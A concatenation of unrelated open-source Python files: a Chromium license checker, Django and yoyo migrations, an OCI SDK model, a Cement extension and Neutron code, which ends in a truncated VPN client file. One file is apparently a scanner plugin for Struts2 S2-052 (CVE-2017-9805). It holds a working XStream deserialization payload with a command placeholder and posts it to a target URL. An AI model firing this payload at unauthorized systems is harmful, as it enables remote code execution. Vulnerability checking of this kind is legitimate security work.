<reponame>zealoussnow/chromium #!/usr/bin/env python # Copyright 2015 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import json import os import sys import common def main_run(args): with common.temporary_file() as tempfile_path: rc = common.run_command([ os.path.join(common.SRC_DIR, 'tools', 'checklicenses', 'checklicenses.py'), '--json', tempfile_path ]) with open(tempfile_path) as f: checklicenses_results = json.load(f) result_set = set() for result in checklicenses_results: result_set.add((result['filename'], result['license'])) json.dump({ 'valid': True, 'failures': ['%s: %s' % (r[0], r[1]) for r in result_set], }, args.output) return rc def main_compile_targets(args): json.dump([], args.output) if __name__ == '__main__': funcs = { 'run': main_run, 'compile_targets': main_compile_targets, } sys.exit(common.run_script(sys.argv[1:], funcs))
python/app/plugins/http/Struts2/S2_052.py
taomujian/linbing
351
8513
#!/usr/bin/env python3 from app.lib.utils.request import request from app.lib.utils.encode import base64encode from app.lib.utils.common import get_capta, get_useragent class S2_052_BaseVerify: def __init__(self, url): self.info = { 'name': 'S2-052漏洞,又名CVE-2017-9805漏洞', 'description': 'Struts2 Remote Code Execution Vulnerability, Struts 2.1.6 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12', 'date': '2017-09-05', 'exptype': 'check', 'type': 'RCE' } self.url = url if not self.url.startswith("http") and not self.url.startswith("https"): self.url = "http://" + self.url self.capta = get_capta() self.headers = { 'User-Agent': get_useragent(), 'Content-Type': "application/xml", } self.payload =''' <map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> {cmd} </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry> </map> ''' def check(self): """ 检测是否存在漏洞 :param: :return bool True or False: 是否存在漏洞 """ try: self.check_payload = self.payload.format(cmd = '<string>calc</string>') check_req = request.post(self.url, headers = self.headers, data = self.check_payload) if check_req.status_code == 500 and 'java.security.Provider$Service' in check_req.text: return True else: return False except Exception as e: print(e) return False finally: pass if __name__ == "__main__": S2_052 = S2_052_BaseVerify('http://127.0.0.1:8088/struts2_rest_showcase_war_exploded/orders/3')
stores/apps/inventory/migrations/0001_initial.py
diassor/CollectorCity-Market-Place
135
8560
# encoding: utf-8 import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding model 'ProductType' db.create_table('inventory_producttype', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), )) db.send_create_signal('inventory', ['ProductType']) # Adding model 'Product' db.create_table('inventory_product', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('shop', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['shops.Shop'])), ('title', self.gf('django.db.models.fields.CharField')(max_length=200)), ('description', self.gf('django.db.models.fields.TextField')()), ('category', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketCategory'])), ('subcategory', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketSubCategory'])), ('date_time', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)), ('weight', self.gf('django.db.models.fields.DecimalField')(default='0', max_digits=11, decimal_places=2)), ('type', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['inventory.ProductType'], null=True, blank=True)), )) db.send_create_signal('inventory', ['Product']) # Adding model 'Coin' db.create_table('inventory_coin', ( ('producttype_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['inventory.ProductType'], unique=True, primary_key=True)), ('category', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketCategory'], null=True, blank=True)), ('subcategory', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketSubCategory'], null=True, blank=True)), ('country_code', self.gf('django.db.models.fields.CharField')(default='us', max_length=2)), ('pcgs_number', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)), ('description', self.gf('django.db.models.fields.TextField')(default='', blank='')), ('year_issued', self.gf('django.db.models.fields.CharField')(default='', max_length=24, blank='')), ('actual_year', self.gf('django.db.models.fields.CharField')(default='', max_length=24, blank='')), ('denomination', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')), ('major_variety', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')), ('die_variety', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')), ('prefix', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')), ('suffix', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')), ('sort_order', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')), ('heading', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')), ('holder_variety', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')), ('holder_variety_2', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')), ('additional_data', self.gf('django.db.models.fields.TextField')(default='', blank='')), ('last_update', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)), )) db.send_create_signal('inventory', ['Coin']) def backwards(self, orm): # Deleting model 'ProductType' db.delete_table('inventory_producttype') # Deleting model 'Product' db.delete_table('inventory_product') # Deleting model 'Coin' db.delete_table('inventory_coin') models = { 'auth.group': { 'Meta': {'object_name': 'Group'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, 'auth.permission': { 'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, 'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('<PASSWORD>', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}) }, 'contenttypes.contenttype': { 'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) }, 'inventory.coin': { 'Meta': {'object_name': 'Coin', '_ormbases': ['inventory.ProductType']}, 'actual_year': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '24', 'blank': "''"}), 'additional_data': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': "''"}), 'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketCategory']", 'null': 'True', 'blank': 'True'}), 'country_code': ('django.db.models.fields.CharField', [], {'default': "'us'", 'max_length': '2'}), 'denomination': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}), 'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': "''"}), 'die_variety': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}), 'heading': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}), 'holder_variety': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}), 'holder_variety_2': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}), 'last_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}), 'major_variety': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}), 'pcgs_number': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}), 'prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}), 'producttype_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['inventory.ProductType']", 'unique': 'True', 'primary_key': 'True'}), 'sort_order': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}), 'subcategory': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketSubCategory']", 'null': 'True', 'blank': 'True'}), 'suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}), 'year_issued': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '24', 'blank': "''"}) }, 'inventory.product': { 'Meta': {'object_name': 'Product'}, 'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketCategory']"}), 'date_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}), 'description': ('django.db.models.fields.TextField', [], {}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shops.Shop']"}), 'subcategory': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketSubCategory']"}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['inventory.ProductType']", 'null': 'True', 'blank': 'True'}), 'weight': ('django.db.models.fields.DecimalField', [], {'default': "'0'", 'max_digits': '11', 'decimal_places': '2'}) }, 'inventory.producttype': { 'Meta': {'object_name': 'ProductType'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}) }, 'market.marketcategory': { 'Meta': {'object_name': 'MarketCategory'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}), 'order': ('django.db.models.fields.IntegerField', [], {'default': '255'}), 'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '60', 'db_index': 'True'}) }, 'market.marketplace': { 'Meta': {'object_name': 'MarketPlace'}, 'base_domain': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '92'}), 'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '92', 'db_index': 'True'}), 'template_prefix': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '92', 'db_index': 'True'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '92'}) }, 'market.marketsubcategory': { 'Meta': {'unique_together': "(('parent', 'slug'),)", 'object_name': 'MarketSubCategory'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}), 'order': ('django.db.models.fields.IntegerField', [], {'default': '255'}), 'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'subcategories'", 'null': 'True', 'to': "orm['market.MarketCategory']"}), 'slug': ('django.db.models.fields.SlugField', [], {'max_length': '60', 'db_index': 'True'}) }, 'shops.shop': { 'Meta': {'object_name': 'Shop'}, 'admin': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}), 'bids': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'date_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'location': ('django.db.models.fields.CharField', [], {'default': "'39.29038,-76.61219'", 'max_length': '255'}), 'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}), 'views': ('django.db.models.fields.IntegerField', [], {'default': '0'}) } } complete_apps = ['inventory']
src/oci/management_agent/models/management_agent_aggregation_dimensions.py
CentroidChef/oci-python-sdk
249
8563
# coding: utf-8 # Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved. # This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license. from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401 from oci.decorators import init_model_state_from_kwargs @init_model_state_from_kwargs class ManagementAgentAggregationDimensions(object): """ The Aggregation of Management Agent Dimensions """ #: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions. #: This constant has a value of "ACTIVE" AVAILABILITY_STATUS_ACTIVE = "ACTIVE" #: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions. #: This constant has a value of "SILENT" AVAILABILITY_STATUS_SILENT = "SILENT" #: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions. #: This constant has a value of "NOT_AVAILABLE" AVAILABILITY_STATUS_NOT_AVAILABLE = "NOT_AVAILABLE" #: A constant which can be used with the platform_type property of a ManagementAgentAggregationDimensions. #: This constant has a value of "LINUX" PLATFORM_TYPE_LINUX = "LINUX" #: A constant which can be used with the platform_type property of a ManagementAgentAggregationDimensions. #: This constant has a value of "WINDOWS" PLATFORM_TYPE_WINDOWS = "WINDOWS" #: A constant which can be used with the install_type property of a ManagementAgentAggregationDimensions. #: This constant has a value of "AGENT" INSTALL_TYPE_AGENT = "AGENT" #: A constant which can be used with the install_type property of a ManagementAgentAggregationDimensions. #: This constant has a value of "GATEWAY" INSTALL_TYPE_GATEWAY = "GATEWAY" def __init__(self, **kwargs): """ Initializes a new ManagementAgentAggregationDimensions object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param availability_status: The value to assign to the availability_status property of this ManagementAgentAggregationDimensions. Allowed values for this property are: "ACTIVE", "SILENT", "NOT_AVAILABLE", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type availability_status: str :param platform_type: The value to assign to the platform_type property of this ManagementAgentAggregationDimensions. Allowed values for this property are: "LINUX", "WINDOWS", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type platform_type: str :param version: The value to assign to the version property of this ManagementAgentAggregationDimensions. :type version: str :param has_plugins: The value to assign to the has_plugins property of this ManagementAgentAggregationDimensions. :type has_plugins: bool :param install_type: The value to assign to the install_type property of this ManagementAgentAggregationDimensions. Allowed values for this property are: "AGENT", "GATEWAY", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type install_type: str """ self.swagger_types = { 'availability_status': 'str', 'platform_type': 'str', 'version': 'str', 'has_plugins': 'bool', 'install_type': 'str' } self.attribute_map = { 'availability_status': 'availabilityStatus', 'platform_type': 'platformType', 'version': 'version', 'has_plugins': 'hasPlugins', 'install_type': 'installType' } self._availability_status = None self._platform_type = None self._version = None self._has_plugins = None self._install_type = None @property def availability_status(self): """ Gets the availability_status of this ManagementAgentAggregationDimensions. The availability status of managementAgent Allowed values for this property are: "ACTIVE", "SILENT", "NOT_AVAILABLE", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :return: The availability_status of this ManagementAgentAggregationDimensions. :rtype: str """ return self._availability_status @availability_status.setter def availability_status(self, availability_status): """ Sets the availability_status of this ManagementAgentAggregationDimensions. The availability status of managementAgent :param availability_status: The availability_status of this ManagementAgentAggregationDimensions. :type: str """ allowed_values = ["ACTIVE", "SILENT", "NOT_AVAILABLE"] if not value_allowed_none_or_none_sentinel(availability_status, allowed_values): availability_status = 'UNKNOWN_ENUM_VALUE' self._availability_status = availability_status @property def platform_type(self): """ Gets the platform_type of this ManagementAgentAggregationDimensions. Platform Type Allowed values for this property are: "LINUX", "WINDOWS", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :return: The platform_type of this ManagementAgentAggregationDimensions. :rtype: str """ return self._platform_type @platform_type.setter def platform_type(self, platform_type): """ Sets the platform_type of this ManagementAgentAggregationDimensions. Platform Type :param platform_type: The platform_type of this ManagementAgentAggregationDimensions. :type: str """ allowed_values = ["LINUX", "WINDOWS"] if not value_allowed_none_or_none_sentinel(platform_type, allowed_values): platform_type = 'UNKNOWN_ENUM_VALUE' self._platform_type = platform_type @property def version(self): """ Gets the version of this ManagementAgentAggregationDimensions. Agent image version :return: The version of this ManagementAgentAggregationDimensions. :rtype: str """ return self._version @version.setter def version(self, version): """ Sets the version of this ManagementAgentAggregationDimensions. Agent image version :param version: The version of this ManagementAgentAggregationDimensions. :type: str """ self._version = version @property def has_plugins(self): """ Gets the has_plugins of this ManagementAgentAggregationDimensions. Whether or not a managementAgent has at least one plugin :return: The has_plugins of this ManagementAgentAggregationDimensions. :rtype: bool """ return self._has_plugins @has_plugins.setter def has_plugins(self, has_plugins): """ Sets the has_plugins of this ManagementAgentAggregationDimensions. Whether or not a managementAgent has at least one plugin :param has_plugins: The has_plugins of this ManagementAgentAggregationDimensions. :type: bool """ self._has_plugins = has_plugins @property def install_type(self): """ Gets the install_type of this ManagementAgentAggregationDimensions. The install type, either AGENT or GATEWAY Allowed values for this property are: "AGENT", "GATEWAY", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :return: The install_type of this ManagementAgentAggregationDimensions. :rtype: str """ return self._install_type @install_type.setter def install_type(self, install_type): """ Sets the install_type of this ManagementAgentAggregationDimensions. The install type, either AGENT or GATEWAY :param install_type: The install_type of this ManagementAgentAggregationDimensions. :type: str """ allowed_values = ["AGENT", "GATEWAY"] if not value_allowed_none_or_none_sentinel(install_type, allowed_values): install_type = 'UNKNOWN_ENUM_VALUE' self._install_type = install_type def __repr__(self): return formatted_flat_dict(self) def __eq__(self, other): if other is None: return False return self.__dict__ == other.__dict__ def __ne__(self, other): return not self == other
cement/ext/ext_generate.py
tomekr/cement
826
8583
""" Cement generate extension module. """ import re import os import inspect import yaml import shutil from .. import Controller, minimal_logger, shell from ..utils.version import VERSION, get_version LOG = minimal_logger(__name__) class GenerateTemplateAbstractBase(Controller): class Meta: pass def _generate(self, source, dest): msg = 'Generating %s %s in %s' % ( self.app._meta.label, self._meta.label, dest ) self.app.log.info(msg) data = {} # builtin vars maj_min = float('%s.%s' % (VERSION[0], VERSION[1])) data['cement'] = {} data['cement']['version'] = get_version() data['cement']['major_version'] = VERSION[0] data['cement']['minor_version'] = VERSION[1] data['cement']['major_minor_version'] = maj_min f = open(os.path.join(source, '.generate.yml')) yaml_load = yaml.full_load if hasattr(yaml, 'full_load') else yaml.load g_config = yaml_load(f) f.close() vars = g_config.get('variables', {}) exclude_list = g_config.get('exclude', []) ignore_list = g_config.get('ignore', []) # default ignore the .generate.yml config g_config_yml = r'^(.*)[\/\\\\]%s[\/\\\\]\.generate\.yml$' % \ self._meta.label ignore_list.append(g_config_yml) var_defaults = { 'name': None, 'prompt': None, 'validate': None, 'case': None, 'default': None, } for defined_var in vars: var = var_defaults.copy() var.update(defined_var) for key in ['name', 'prompt']: assert var[key] is not None, \ "Required generate config key missing: %s" % key val = None if var['default'] is not None and self.app.pargs.defaults: val = var['default'] elif var['default'] is not None: default_text = ' [%s]' % var['default'] else: default_text = '' # pragma: nocover if val is None: class MyPrompt(shell.Prompt): class Meta: text = "%s%s:" % (var['prompt'], default_text) default = var.get('default', None) p = MyPrompt() val = p.prompt() # pragma: nocover if var['case'] in ['lower', 'upper', 'title']: val = getattr(val, var['case'])() elif var['case'] is not None: self.app.log.warning( "Invalid configuration for variable " + "'%s': " % var['name'] + "case must be one of lower, upper, or title." ) if var['validate'] is not None: assert re.match(var['validate'], val), \ "Invalid Response (must match: '%s')" % var['validate'] data[var['name']] = val try: self.app.template.copy(source, dest, data, force=self.app.pargs.force, ignore=ignore_list, exclude=exclude_list) except AssertionError as e: if re.match('(.*)already exists(.*)', e.args[0]): raise AssertionError(e.args[0] + ' (try: --force)') else: raise # pragma: nocover def _clone(self, source, dest): msg = 'Cloning %s %s template to %s' % ( self.app._meta.label, self._meta.label, dest ) self.app.log.info(msg) if os.path.exists(dest) and self.app.pargs.force is True: shutil.rmtree(dest) elif os.path.exists(dest): msg = "Destination path already exists: %s (try: --force)" % dest raise AssertionError(msg) shutil.copytree(source, dest) def _default(self): source = self._meta.source_path dest = self.app.pargs.dest if self.app.pargs.clone is True: self._clone(source, dest) else: self._generate(source, dest) def setup_template_items(app): template_dirs = [] template_items = [] # look in app template dirs for path in app._meta.template_dirs: subpath = os.path.join(path, 'generate') if os.path.exists(subpath) and subpath not in template_dirs: template_dirs.append(subpath) # use app template module, find it's path on filesystem if app._meta.template_module is not None: mod_parts = app._meta.template_module.split('.') mod = mod_parts.pop() try: mod = app.__import__(mod, from_module='.'.join(mod_parts)) mod_path = os.path.dirname(inspect.getfile(mod)) subpath = os.path.join(mod_path, 'generate') if os.path.exists(subpath) and subpath not in template_dirs: template_dirs.append(subpath) # FIXME: not exactly sure how to test for this so not covering except AttributeError: # pragma: nocover msg = 'unable to load template module' + \ '%s from %s' % (mod, '.'.join(mod_parts)) # pragma: nocover app.log.debug(msg) # pragma: nocover for path in template_dirs: for item in os.listdir(path): if item not in template_items: template_items.append(item) class GenerateTemplate(GenerateTemplateAbstractBase): class Meta: label = item stacked_on = 'generate' stacked_type = 'nested' help = 'generate %s from template' % item arguments = [ # ------------------------------------------------------ (['dest'], {'help': 'destination directory path'}), # ------------------------------------------------------ (['-f', '--force'], {'help': 'force operation if destination exists', 'dest': 'force', 'action': 'store_true'}), # ------------------------------------------------------ (['-D', '--defaults'], {'help': 'use all default variable values', 'dest': 'defaults', 'action': 'store_true'}), # ------------------------------------------------------ (['--clone'], {'help': 'clone this template to destination path', 'dest': 'clone', 'action': 'store_true'}), ] source_path = os.path.join(path, item) app.handler.register(GenerateTemplate) class Generate(Controller): class Meta: label = 'generate' stacked_on = 'base' stacked_type = 'nested' config_section = 'generate' def _setup(self, app): super(Generate, self)._setup(app) def _default(self): self._parser.print_help() def load(app): app.handler.register(Generate) app.hook.register('pre_run', setup_template_items)
neutron/agent/ovsdb/native/helpers.py
congnt95/neutron
1,080
8609
# Copyright (c) 2015 Red Hat, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import functools from oslo_config import cfg from neutron.conf.agent import ovs_conf as agent_ovs_conf from neutron.conf.plugins.ml2.drivers import ovs_conf as ml2_ovs_conf from neutron.privileged.agent.ovsdb.native import helpers as priv_helpers agent_ovs_conf.register_ovs_agent_opts(cfg.CONF) ml2_ovs_conf.register_ovs_opts(cfg=cfg.CONF) enable_connection_uri = functools.partial( priv_helpers.enable_connection_uri, log_fail_as_error=False, check_exit_code=False, timeout=cfg.CONF.OVS.ovsdb_timeout, inactivity_probe=cfg.CONF.OVS.of_inactivity_probe * 1000)
migrations/20220114_03_Heqaz-insert-default-serverinfo.py
lin483/Funny-Nations
126
8621
<gh_stars>100-1000 """ insert default serverInfo """ from yoyo import step __depends__ = {'20220114_02_lHBKM-new-table-serverinfo'} steps = [ step("INSERT INTO `serverInfo` (`onlineMinute`) VALUES (0);") ]
neutronclient/osc/v2/vpnaas/ipsec_site_connection.py
slawqo/python-neutronclient
120
8622
<gh_stars>100-1000 # Copyright 2017 FUJITSU LIMITED # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # from osc_lib.cli import format_columns from osc_lib.command import command from osc_lib import exceptions from osc_lib import utils from osc_lib.utils import columns as column_util from oslo_log import log as logging from neutronclient._i18n import _ from neutronclient.common import utils as nc_utils from neutronclient.osc import utils as osc_utils from neutronclient.osc.v2.vpnaas import utils as vpn_utils LOG = logging.getLogger(__name__) _formatters = { 'peer_cidrs': format_columns.ListColumn } _attr_map = ( ('id', 'ID', column_util.LIST_BOTH), ('name', 'Name', column_util.LIST_BOTH), ('peer_address', 'Peer Address', column_util.LIST_BOTH), ('auth_mode', 'Authentication Algorithm', column_util.LIST_BOTH), ('status', 'Status', column_util.LIST_BOTH), ('tenant_id', 'Project', column_util.LIST_LONG_ONLY), ('peer_cidrs', 'Peer CIDRs', column_util.LIST_LONG_ONLY), ('vpnservice_id', 'VPN Service', column_util.LIST_LONG_ONLY), ('ipsecpolicy_id', 'IPSec Policy', column_util.LIST_LONG_ONLY), ('ikepolicy_id', 'IKE Policy', column_util.LIST_LONG_ONLY), ('mtu', 'MTU', column_util.LIST_LONG_ONLY), ('initiator', 'Initiator', column_util.LIST_LONG_ONLY), ('admin_state_up', 'State', column_util.LIST_LONG_ONLY), ('description', 'Description', column_util.LIST_LONG_ONLY), ('psk', 'Pre-shared Key', column_util.LIST_LONG_ONLY), ('route_mode', 'Route Mode', column_util.LIST_LONG_ONLY), ('local_id', 'Local ID', column_util.LIST_LONG_ONLY), ('peer_id', 'Peer ID', column_util.LIST_LONG_ONLY), ('local_ep_group_id', 'Local Endpoint Group ID', column_util.LIST_LONG_ONLY), ('peer_ep_group_id', 'Peer Endpoint Group ID', column_util.LIST_LONG_ONLY), ) def _convert_to_lowercase(string): return string.lower() def _get_common_parser(parser, is_create=True): parser.add_argument( '--description', metavar='<description>', help=_('Description for the connection')) parser.add_argument( '--dpd', metavar="action=ACTION,interval=INTERVAL,timeout=TIMEOUT", type=nc_utils.str2dict_type( optional_keys=['action', 'interval', 'timeout']), help=vpn_utils.dpd_help("IPsec connection")) parser.add_argument( '--mtu', help=_('MTU size for the connection')) parser.add_argument( '--initiator', choices=['bi-directional', 'response-only'], type=_convert_to_lowercase, help=_('Initiator state')) peer_group = parser.add_mutually_exclusive_group() peer_group.add_argument( '--peer-cidr', dest='peer_cidrs', help=_('Remote subnet(s) in CIDR format. ' 'Cannot be specified when using endpoint groups. Only ' 'applicable, if subnet provided for VPN service.') ) peer_group.add_argument( '--local-endpoint-group', help=_('Local endpoint group (name or ID) with subnet(s) ' 'for IPsec connection') ) parser.add_argument( '--peer-endpoint-group', help=_('Peer endpoint group (name or ID) with CIDR(s) for ' 'IPSec connection')) admin_group = parser.add_mutually_exclusive_group() admin_group.add_argument( '--enable', action='store_true', help=_("Enable IPSec site connection") ) admin_group.add_argument( '--disable', action='store_true', help=_("Disable IPSec site connection") ) parser.add_argument( '--local-id', help=_('An ID to be used instead of the external IP ' 'address for a virtual router')) return parser def _get_common_attrs(client_manager, parsed_args, is_create=True): attrs = {} if is_create: if 'project' in parsed_args and parsed_args.project is not None: attrs['tenant_id'] = osc_utils.find_project( client_manager.identity, parsed_args.project, parsed_args.project_domain, ).id if parsed_args.description: attrs['description'] = str(parsed_args.description) if 